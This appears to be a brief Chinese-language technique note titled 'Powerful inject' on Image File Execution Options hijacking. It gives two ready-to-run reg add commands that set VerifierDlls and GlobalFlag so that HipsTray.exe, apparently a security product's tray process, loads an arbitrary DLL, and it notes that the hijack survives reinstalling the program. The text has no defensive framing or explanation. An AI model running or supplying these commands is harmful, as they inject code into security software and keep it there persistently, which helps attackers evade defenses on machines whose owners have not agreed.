Powerful inject

Powerful inject

镜像劫持,指定进程加载指定dll

重装程序劫持依旧生效。

1
2
reg add "hklm\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsTray.exe"  /v VerifierDlls /t REG_SZ /d test.dll
reg add "hklm\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsTray.exe" /v GlobalFlag /t REG_DWORD /d 256